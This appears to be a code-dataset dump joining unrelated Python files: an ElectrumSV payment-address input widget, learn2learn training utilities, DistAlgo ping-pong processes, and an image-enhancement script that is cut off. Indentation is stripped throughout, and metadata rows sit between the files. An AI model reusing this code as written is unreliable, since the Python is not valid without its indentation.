# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
from decimal import Decimal
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontMetrics, QTextCursor
from PyQt5.QtWidgets import QCompleter, QPlainTextEdit
from bitcoinx import cashaddr, Script, Address, TxOutput
from .qrtextedit import ScanQRTextEdit
from electrumsv.i18n import _
from electrumsv.web import is_URI
from . import util
RE_ALIAS = '^(.*?)\s*\<([0-9A-Za-z:]{26,})\>$'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
''' timestamp indicating when the user was last warned about using cash addresses. '''
last_cashaddr_warning = None
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self._on_text_changed)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def set_validated(self):
self.setStyleSheet(util.ColorScheme.GREEN.as_stylesheet(True))
def set_expired(self):
self.setStyleSheet(util.ColorScheme.RED.as_stylesheet(True))
def _show_cashaddr_warning(self, address_text):
'''
cash addresses are not in the future for BSV. Anyone who uses one should be warned that
they are being phased out, in order to encourage them to pre-emptively move on.
'''
address_text = self._parse_address_text(address_text)
# We only care if it is decoded, as this will be a cash address.
try:
cashaddr.decode(address_text)
except:
return
last_check_time = PayToEdit.last_cashaddr_warning
ignore_watermark_time = time.time() - 24 * 60 * 60
if last_check_time is None or last_check_time < ignore_watermark_time:
PayToEdit.last_cashaddr_warning = time.time()
message = ("<p>"+
_("One or more of the addresses you have provided has been recognized "+
"as a 'cash address'. For now, this is acceptable but is recommended that you get "+
"in the habit of requesting that anyone who provides you with payment addresses "+
"do so in the form of normal Bitcoin SV addresses.")+
"</p>"+
"<p>"+
_("Within the very near future, various services and applications in the Bitcoin "+
"SV ecosystem will stop accepting 'cash addresses'. It is in your best interest "+
"to make sure you transition over to normal Bitcoin SV addresses as soon as "+
"possible, in order to ensure that you can both be paid, and also get paid.")+
"</p>"
)
util.MessageBox.show_warning(message, title=_("Cash address warning"))
def _parse_tx_output(self, line):
x, y = line.split(',')
script = self._parse_output(x)
if not isinstance(script, Script): # An Address object
script = script.to_script()
amount = self._parse_amount(y)
return TxOutput(amount, script)
def _parse_output(self, x):
try:
address = self._parse_address(x)
self._show_cashaddr_warning(x)
return address
except:
return Script.from_asm(x)
def _parse_address_text(self, line):
'''
This checks to see if the address is in the form of a contact, with name and address,
and if so, extracts the address. Otherwise the line is assumed to be the address.
'''
r = line.strip()
m = re.match(RE_ALIAS, r)
return m.group(2) if m else r
def _parse_address(self, line):
address = self._parse_address_text(line)
return Address.from_string(address)
def _parse_amount(self, x):
if x.strip() == '!':
return all
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def _on_text_changed(self):
self.errors = []
if self.is_pr:
return
# filter out empty lines
lines = [i for i in self._lines() if i]
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if is_URI(data):
self.scan_f(data)
return
try:
self.payto_address = self._parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
tx_output = self._parse_tx_output(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append(tx_output)
if tx_output.value is all:
is_max = True
else:
total += tx_output.value
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = all
else:
amount = self.amount_edit.get_amount()
addr = self.payto_address
self.outputs = [TxOutput(amount, addr.to_script())]
return self.outputs[:]
def _lines(self):
return self.toPlainText().split('\n')
def _is_multiline(self):
return len(self._lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
lineHeight = QFontMetrics(self.document().defaultFont()).height()
docHeight = self.document().size().height()
h = docHeight * lineHeight + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def set_completer(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self._insert_completion)
def _insert_completion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = len(completion) - len(self.c.completionPrefix())
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion[-extra:])
self.setTextCursor(tc)
def _get_text_under_cursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self._is_multiline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
ctrlOrShift = e.modifiers() and (Qt.ControlModifier or Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and not e.text()):
return
eow = "~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-="
hasModifier = (e.modifiers() != Qt.NoModifier) and not ctrlOrShift
completionPrefix = self._get_text_under_cursor()
if hasModifier or not e.text() or len(completionPrefix) < 1 or eow.find(e.text()[-1]) >= 0:
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix)
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0)
+ self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data and data.startswith("bitcoincash:"):
self.scan_f(data)
# TODO: update fee
def resolve(self):
self.is_alias = False
if self.hasFocus():
return
if self._is_multiline(): # only supports single line entries atm
return
if self.is_pr:
return
key = str(self.toPlainText())
if key == self.previous_payto:
return
self.previous_payto = key
| 34.234727
| 100
| 0.609749
|
import re
import time
from decimal import Decimal
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontMetrics, QTextCursor
from PyQt5.QtWidgets import QCompleter, QPlainTextEdit
from bitcoinx import cashaddr, Script, Address, TxOutput
from .qrtextedit import ScanQRTextEdit
from electrumsv.i18n import _
from electrumsv.web import is_URI
from . import util
RE_ALIAS = '^(.*?)\s*\<([0-9A-Za-z:]{26,})\>$'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
last_cashaddr_warning = None
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self._on_text_changed)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def set_validated(self):
self.setStyleSheet(util.ColorScheme.GREEN.as_stylesheet(True))
def set_expired(self):
self.setStyleSheet(util.ColorScheme.RED.as_stylesheet(True))
def _show_cashaddr_warning(self, address_text):
address_text = self._parse_address_text(address_text)
try:
cashaddr.decode(address_text)
except:
return
last_check_time = PayToEdit.last_cashaddr_warning
ignore_watermark_time = time.time() - 24 * 60 * 60
if last_check_time is None or last_check_time < ignore_watermark_time:
PayToEdit.last_cashaddr_warning = time.time()
message = ("<p>"+
_("One or more of the addresses you have provided has been recognized "+
"as a 'cash address'. For now, this is acceptable but is recommended that you get "+
"in the habit of requesting that anyone who provides you with payment addresses "+
"do so in the form of normal Bitcoin SV addresses.")+
"</p>"+
"<p>"+
_("Within the very near future, various services and applications in the Bitcoin "+
"SV ecosystem will stop accepting 'cash addresses'. It is in your best interest "+
"to make sure you transition over to normal Bitcoin SV addresses as soon as "+
"possible, in order to ensure that you can both be paid, and also get paid.")+
"</p>"
)
util.MessageBox.show_warning(message, title=_("Cash address warning"))
def _parse_tx_output(self, line):
x, y = line.split(',')
script = self._parse_output(x)
if not isinstance(script, Script):
script = script.to_script()
amount = self._parse_amount(y)
return TxOutput(amount, script)
def _parse_output(self, x):
try:
address = self._parse_address(x)
self._show_cashaddr_warning(x)
return address
except:
return Script.from_asm(x)
def _parse_address_text(self, line):
r = line.strip()
m = re.match(RE_ALIAS, r)
return m.group(2) if m else r
def _parse_address(self, line):
address = self._parse_address_text(line)
return Address.from_string(address)
def _parse_amount(self, x):
if x.strip() == '!':
return all
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def _on_text_changed(self):
self.errors = []
if self.is_pr:
return
lines = [i for i in self._lines() if i]
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if is_URI(data):
self.scan_f(data)
return
try:
self.payto_address = self._parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
tx_output = self._parse_tx_output(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append(tx_output)
if tx_output.value is all:
is_max = True
else:
total += tx_output.value
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = all
else:
amount = self.amount_edit.get_amount()
addr = self.payto_address
self.outputs = [TxOutput(amount, addr.to_script())]
return self.outputs[:]
def _lines(self):
return self.toPlainText().split('\n')
def _is_multiline(self):
return len(self._lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
lineHeight = QFontMetrics(self.document().defaultFont()).height()
docHeight = self.document().size().height()
h = docHeight * lineHeight + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def set_completer(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self._insert_completion)
def _insert_completion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = len(completion) - len(self.c.completionPrefix())
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion[-extra:])
self.setTextCursor(tc)
def _get_text_under_cursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self._is_multiline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
ctrlOrShift = e.modifiers() and (Qt.ControlModifier or Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and not e.text()):
return
eow = "~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-="
hasModifier = (e.modifiers() != Qt.NoModifier) and not ctrlOrShift
completionPrefix = self._get_text_under_cursor()
if hasModifier or not e.text() or len(completionPrefix) < 1 or eow.find(e.text()[-1]) >= 0:
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix)
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0)
+ self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data and data.startswith("bitcoincash:"):
self.scan_f(data)
# TODO: update fee
def resolve(self):
self.is_alias = False
if self.hasFocus():
return
if self._is_multiline(): # only supports single line entries atm
return
if self.is_pr:
return
key = str(self.toPlainText())
if key == self.previous_payto:
return
self.previous_payto = key
| true
| true
|
1c3ea5c07c06add4518f160f65a5c991fbe69550
| 878
|
py
|
Python
|
learn2learn-master/JSrc/jutils.py
|
hikmatkhan/Higher
|
b47c758dbe194abd98847a0f935b51f09ab772b0
|
[
"MIT"
] | null | null | null |
learn2learn-master/JSrc/jutils.py
|
hikmatkhan/Higher
|
b47c758dbe194abd98847a0f935b51f09ab772b0
|
[
"MIT"
] | null | null | null |
learn2learn-master/JSrc/jutils.py
|
hikmatkhan/Higher
|
b47c758dbe194abd98847a0f935b51f09ab772b0
|
[
"MIT"
] | null | null | null |
import random
import learn2learn
import numpy as np
import torch
import torchvision
from learn2learn.data import TaskDataset
from learn2learn.data.transforms import NWays, KShots, LoadData
import wandb
from torch import nn
from torchvision.models import resnet18
from torchvision.transforms import transforms
def fix_seeds(seed=101):
# No randomization
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.device_count():
torch.cuda.manual_seed(seed)
return seed
def get_compute_device():
device = torch.device('cpu')
if torch.cuda.device_count():
device = torch.device('cuda')
return device
def init_wandb(args, model=None):
wandb.init(project=args.wand_project, entity=args.username, reinit=True)
wandb.config.update(args)
if model != None:
wandb.watch(model, log_freq=10)
| 23.72973
| 76
| 0.736902
|
import random
import learn2learn
import numpy as np
import torch
import torchvision
from learn2learn.data import TaskDataset
from learn2learn.data.transforms import NWays, KShots, LoadData
import wandb
from torch import nn
from torchvision.models import resnet18
from torchvision.transforms import transforms
def fix_seeds(seed=101):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.device_count():
torch.cuda.manual_seed(seed)
return seed
def get_compute_device():
device = torch.device('cpu')
if torch.cuda.device_count():
device = torch.device('cuda')
return device
def init_wandb(args, model=None):
wandb.init(project=args.wand_project, entity=args.username, reinit=True)
wandb.config.update(args)
if model != None:
wandb.watch(model, log_freq=10)
| true
| true
|
1c3ea5e937371a3b5efe0501eae3e78cdfc93c6c
| 4,331
|
py
|
Python
|
da/examples/pingpong/ping.py
|
yagrawal-sbu/distalgo
|
10e6db89b7db05d3b076dcf9295ce4f189558323
|
[
"MIT"
] | null | null | null |
da/examples/pingpong/ping.py
|
yagrawal-sbu/distalgo
|
10e6db89b7db05d3b076dcf9295ce4f189558323
|
[
"MIT"
] | null | null | null |
da/examples/pingpong/ping.py
|
yagrawal-sbu/distalgo
|
10e6db89b7db05d3b076dcf9295ce4f189558323
|
[
"MIT"
] | null | null | null |
# -*- generated by 1.0.9 -*-
import da
PatternExpr_177 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_182 = da.pat.FreePattern('p')
PatternExpr_201 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_206 = da.pat.FreePattern('p')
PatternExpr_249 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
PatternExpr_254 = da.pat.FreePattern('rclk')
PatternExpr_274 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
_config_object = {}
import sys
class Pong(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PongReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_0', PatternExpr_177, sources=[PatternExpr_182], destinations=None, timestamps=None, record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_1', PatternExpr_201, sources=[PatternExpr_206], destinations=None, timestamps=None, record_history=None, handlers=[self._Pong_handler_200])])
def setup(self, total_pings, **rest_346):
super().setup(total_pings=total_pings, **rest_346)
self._state.total_pings = total_pings
pass
def run(self):
a = False
super()._label('_st_label_172', block=False)
_st_label_172 = 0
while (_st_label_172 == 0):
_st_label_172 += 1
if (len([p for (_, (_, _, p), (_ConstantPattern193_,)) in self._PongReceivedEvent_0 if (_ConstantPattern193_ == 'Ping')]) == self._state.total_pings):
_st_label_172 += 1
else:
super()._label('_st_label_172', block=True)
_st_label_172 -= 1
def _Pong_handler_200(self, p):
self.output('Pinged')
self.send(('Pong',), to=p)
_Pong_handler_200._labels = None
_Pong_handler_200._notlabels = None
class Ping(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PingReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_0', PatternExpr_249, sources=None, destinations=None, timestamps=[PatternExpr_254], record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_1', PatternExpr_274, sources=None, destinations=None, timestamps=None, record_history=None, handlers=[self._Ping_handler_273])])
def setup(self, p, nrounds, **rest_346):
super().setup(p=p, nrounds=nrounds, **rest_346)
self._state.p = p
self._state.nrounds = nrounds
pass
def run(self):
for i in range(self._state.nrounds):
clk = self.logical_clock()
self.send(('Ping',), to=self._state.p)
super()._label('_st_label_246', block=False)
rclk = None
def ExistentialOpExpr_247():
nonlocal rclk
for (_, (rclk, _, _), (_ConstantPattern265_,)) in self._PingReceivedEvent_0:
if (_ConstantPattern265_ == 'Pong'):
if (rclk > clk):
return True
return False
_st_label_246 = 0
while (_st_label_246 == 0):
_st_label_246 += 1
if ExistentialOpExpr_247():
_st_label_246 += 1
else:
super()._label('_st_label_246', block=True)
_st_label_246 -= 1
else:
if (_st_label_246 != 2):
continue
if (_st_label_246 != 2):
break
def _Ping_handler_273(self):
self.output('Ponged.')
_Ping_handler_273._labels = None
_Ping_handler_273._notlabels = None
class Node_(da.NodeProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._events.extend([])
_config_object = {'clock': 'Lamport'}
def run(self):
nrounds = (int(sys.argv[1]) if (len(sys.argv) > 1) else 3)
npings = (int(sys.argv[2]) if (len(sys.argv) > 2) else 3)
pong = self.new(Pong, [(nrounds * npings)], num=1)
ping = self.new(Ping, num=npings)
self._setup(ping, (pong, nrounds))
self._start(pong)
self._start(ping)
| 41.644231
| 413
| 0.619487
|
import da
PatternExpr_177 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_182 = da.pat.FreePattern('p')
PatternExpr_201 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_206 = da.pat.FreePattern('p')
PatternExpr_249 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
PatternExpr_254 = da.pat.FreePattern('rclk')
PatternExpr_274 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
_config_object = {}
import sys
class Pong(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PongReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_0', PatternExpr_177, sources=[PatternExpr_182], destinations=None, timestamps=None, record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_1', PatternExpr_201, sources=[PatternExpr_206], destinations=None, timestamps=None, record_history=None, handlers=[self._Pong_handler_200])])
def setup(self, total_pings, **rest_346):
super().setup(total_pings=total_pings, **rest_346)
self._state.total_pings = total_pings
pass
def run(self):
a = False
super()._label('_st_label_172', block=False)
_st_label_172 = 0
while (_st_label_172 == 0):
_st_label_172 += 1
if (len([p for (_, (_, _, p), (_ConstantPattern193_,)) in self._PongReceivedEvent_0 if (_ConstantPattern193_ == 'Ping')]) == self._state.total_pings):
_st_label_172 += 1
else:
super()._label('_st_label_172', block=True)
_st_label_172 -= 1
def _Pong_handler_200(self, p):
self.output('Pinged')
self.send(('Pong',), to=p)
_Pong_handler_200._labels = None
_Pong_handler_200._notlabels = None
class Ping(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PingReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_0', PatternExpr_249, sources=None, destinations=None, timestamps=[PatternExpr_254], record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_1', PatternExpr_274, sources=None, destinations=None, timestamps=None, record_history=None, handlers=[self._Ping_handler_273])])
def setup(self, p, nrounds, **rest_346):
super().setup(p=p, nrounds=nrounds, **rest_346)
self._state.p = p
self._state.nrounds = nrounds
pass
def run(self):
for i in range(self._state.nrounds):
clk = self.logical_clock()
self.send(('Ping',), to=self._state.p)
super()._label('_st_label_246', block=False)
rclk = None
def ExistentialOpExpr_247():
nonlocal rclk
for (_, (rclk, _, _), (_ConstantPattern265_,)) in self._PingReceivedEvent_0:
if (_ConstantPattern265_ == 'Pong'):
if (rclk > clk):
return True
return False
_st_label_246 = 0
while (_st_label_246 == 0):
_st_label_246 += 1
if ExistentialOpExpr_247():
_st_label_246 += 1
else:
super()._label('_st_label_246', block=True)
_st_label_246 -= 1
else:
if (_st_label_246 != 2):
continue
if (_st_label_246 != 2):
break
def _Ping_handler_273(self):
self.output('Ponged.')
_Ping_handler_273._labels = None
_Ping_handler_273._notlabels = None
class Node_(da.NodeProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._events.extend([])
_config_object = {'clock': 'Lamport'}
def run(self):
nrounds = (int(sys.argv[1]) if (len(sys.argv) > 1) else 3)
npings = (int(sys.argv[2]) if (len(sys.argv) > 2) else 3)
pong = self.new(Pong, [(nrounds * npings)], num=1)
ping = self.new(Ping, num=npings)
self._setup(ping, (pong, nrounds))
self._start(pong)
self._start(ping)
| true
| true
|
1c3ea702689cfcbe442cb760a84ea68038a9b92e
| 4,138
|
py
|
Python
|
Python/create_example_images.py
|
markvilar/focal
|
53b048bc6592b7ad7421ae96c399755570820db6
|
[
"Apache-2.0"
] | 1
|
2021-08-09T12:31:27.000Z
|
2021-08-09T12:31:27.000Z
|
Python/create_example_images.py
|
markvilar/focal
|
53b048bc6592b7ad7421ae96c399755570820db6
|
[
"Apache-2.0"
] | null | null | null |
Python/create_example_images.py
|
markvilar/focal
|
53b048bc6592b7ad7421ae96c399755570820db6
|
[
"Apache-2.0"
] | null | null | null |
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
plt.style.use("./Styles/Scientific.mplstyle")
import cv2
import numpy as np
from PIL import Image
from skimage.metrics import structural_similarity as ssim
from histogram import plot_histogram, plot_histogram_rgb
def normalize_image(arr):
arrmin = np.min(arr)
arr -= arrmin
arrmax = np.max(arr)
arr *= 255.0 / arrmax
return arr
def save_image(img, path, cmap=None, normalize=None):
fig, ax = plt.subplots()
ax.imshow(img, cmap, norm=normalize, resample=False)
ax.axis("off")
fig.tight_layout(pad=0.0)
fig.savefig(path, dpi=300, bbox_inches="tight")
def main():
img_path = "/home/martin/Data/Example-Images/Image-Color.png"
img_dl_path = "/home/martin/Data/Example-Images/Image-Color-UIENet.png"
clahe_clip = 2.0
clahe_size = 20
blf_diameter = 10
blf_color = 60
blf_space = 20
# Load images.
img = cv2.imread(img_path)
img_uienet = cv2.imread(img_dl_path)
# Convert color images.
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
rgb_img_uienet = cv2.cvtColor(img_uienet, cv2.COLOR_BGR2RGB)
# Compute gray images.
img = cv2.cvtColor(rgb_img, cv2.COLOR_RGB2GRAY)
img_uienet = cv2.cvtColor(rgb_img_uienet, cv2.COLOR_RGB2GRAY)
# Create CLAHE.
clahe = cv2.createCLAHE(clipLimit=clahe_clip, \
tileGridSize=(clahe_size, clahe_size))
# BLF filter.
img_blf = cv2.bilateralFilter(img, blf_diameter, \
blf_color, blf_space)
img_he = cv2.bilateralFilter(cv2.equalizeHist(img), blf_diameter, \
blf_color, blf_space)
img_clahe = cv2.bilateralFilter(clahe.apply(img), blf_diameter, \
blf_color, blf_space)
# Compute difference image.
(_, ssi_blf) = ssim(img, img_blf, \
data_range=img_blf.max() - img_blf.min(), full=True)
(_, ssi_he) = ssim(img, img_he, \
data_range=img_he.max() - img_he.min(), full=True)
(_, ssi_clahe) = ssim(img, img_clahe, \
data_range=img_clahe.max() - img_clahe.min(), full=True)
(_, ssi_uienet) = ssim(img, img_uienet, \
data_range=img_uienet.max() - img_uienet.min(), full=True)
# Calculate RGB image histograms.
hist_rgb = plot_histogram_rgb(rgb_img)
hist_rgb_uienet = plot_histogram_rgb(rgb_img_uienet)
# Calculate grayscale image histograms.
hist = plot_histogram(img)
hist_blf = plot_histogram(img_blf)
hist_he = plot_histogram(img_he)
hist_clahe = plot_histogram(img_clahe)
hist_uienet = plot_histogram(img_uienet)
hist_rgb.savefig("/home/martin/Data/Images/Histogram-RGB.png", dpi=300)
hist_rgb_uienet.savefig("/home/martin/Data/Images/Histogram-RGB-UIENet.png", dpi=300)
hist.savefig("/home/martin/Data/Images/Histogram-Gray.png", dpi=300)
hist_blf.savefig("/home/martin/Data/Images/Histogram-Gray-BLF.png", dpi=300)
hist_he.savefig("/home/martin/Data/Images/Histogram-Gray-HE-BLF.png", dpi=300)
hist_clahe.savefig("/home/martin/Data/Images/Histogram-Gray-CLAHE-BLF.png", dpi=300)
hist_uienet.savefig("/home/martin/Data/Images/Histogram-Gray-UIENet-BLF.png", dpi=300)
# Color images.
save_image(rgb_img, "/home/martin/Data/Images/Image-Color.png")
save_image(rgb_img_uienet, "/home/martin/Data/Images/Image-Color-UIENet.png")
# Gray images.
save_image(img, "/home/martin/Data/Images/Image-Gray.png", "gray")
save_image(img_blf, "/home/martin/Data/Images/Image-Gray-BLF.png", "gray")
save_image(img_he, "/home/martin/Data/Images/Image-Gray-HE-BLF.png", "gray")
save_image(img_clahe, "/home/martin/Data/Images/Image-Gray-CLAHE-BLF.png", "gray")
save_image(img_uienet, "/home/martin/Data/Images/Image-Gray-UIENet.png", "gray")
# Difference images.
save_image(ssi_blf, "/home/martin/Data/Images/Image-SSI-BLF.png", "gray")
save_image(ssi_he, "/home/martin/Data/Images/Image-SSI-HE-BLF.png", "gray")
save_image(ssi_clahe, "/home/martin/Data/Images/Image-SSI-CLAHE-BLF.png", "gray")
save_image(ssi_uienet, "/home/martin/Data/Images/Image-SSI-UIENet.png", "gray")
if __name__ == "__main__":
main()
| 37.279279
| 90
| 0.702997
|
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
plt.style.use("./Styles/Scientific.mplstyle")
import cv2
import numpy as np
from PIL import Image
from skimage.metrics import structural_similarity as ssim
from histogram import plot_histogram, plot_histogram_rgb
def normalize_image(arr):
arrmin = np.min(arr)
arr -= arrmin
arrmax = np.max(arr)
arr *= 255.0 / arrmax
return arr
def save_image(img, path, cmap=None, normalize=None):
fig, ax = plt.subplots()
ax.imshow(img, cmap, norm=normalize, resample=False)
ax.axis("off")
fig.tight_layout(pad=0.0)
fig.savefig(path, dpi=300, bbox_inches="tight")
def main():
img_path = "/home/martin/Data/Example-Images/Image-Color.png"
img_dl_path = "/home/martin/Data/Example-Images/Image-Color-UIENet.png"
clahe_clip = 2.0
clahe_size = 20
blf_diameter = 10
blf_color = 60
blf_space = 20
img = cv2.imread(img_path)
img_uienet = cv2.imread(img_dl_path)
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
rgb_img_uienet = cv2.cvtColor(img_uienet, cv2.COLOR_BGR2RGB)
img = cv2.cvtColor(rgb_img, cv2.COLOR_RGB2GRAY)
img_uienet = cv2.cvtColor(rgb_img_uienet, cv2.COLOR_RGB2GRAY)
clahe = cv2.createCLAHE(clipLimit=clahe_clip, \
tileGridSize=(clahe_size, clahe_size))
img_blf = cv2.bilateralFilter(img, blf_diameter, \
blf_color, blf_space)
img_he = cv2.bilateralFilter(cv2.equalizeHist(img), blf_diameter, \
blf_color, blf_space)
img_clahe = cv2.bilateralFilter(clahe.apply(img), blf_diameter, \
blf_color, blf_space)
(_, ssi_blf) = ssim(img, img_blf, \
data_range=img_blf.max() - img_blf.min(), full=True)
(_, ssi_he) = ssim(img, img_he, \
data_range=img_he.max() - img_he.min(), full=True)
(_, ssi_clahe) = ssim(img, img_clahe, \
data_range=img_clahe.max() - img_clahe.min(), full=True)
(_, ssi_uienet) = ssim(img, img_uienet, \
data_range=img_uienet.max() - img_uienet.min(), full=True)
hist_rgb = plot_histogram_rgb(rgb_img)
hist_rgb_uienet = plot_histogram_rgb(rgb_img_uienet)
hist = plot_histogram(img)
hist_blf = plot_histogram(img_blf)
hist_he = plot_histogram(img_he)
hist_clahe = plot_histogram(img_clahe)
hist_uienet = plot_histogram(img_uienet)
hist_rgb.savefig("/home/martin/Data/Images/Histogram-RGB.png", dpi=300)
hist_rgb_uienet.savefig("/home/martin/Data/Images/Histogram-RGB-UIENet.png", dpi=300)
hist.savefig("/home/martin/Data/Images/Histogram-Gray.png", dpi=300)
hist_blf.savefig("/home/martin/Data/Images/Histogram-Gray-BLF.png", dpi=300)
hist_he.savefig("/home/martin/Data/Images/Histogram-Gray-HE-BLF.png", dpi=300)
hist_clahe.savefig("/home/martin/Data/Images/Histogram-Gray-CLAHE-BLF.png", dpi=300)
hist_uienet.savefig("/home/martin/Data/Images/Histogram-Gray-UIENet-BLF.png", dpi=300)
save_image(rgb_img, "/home/martin/Data/Images/Image-Color.png")
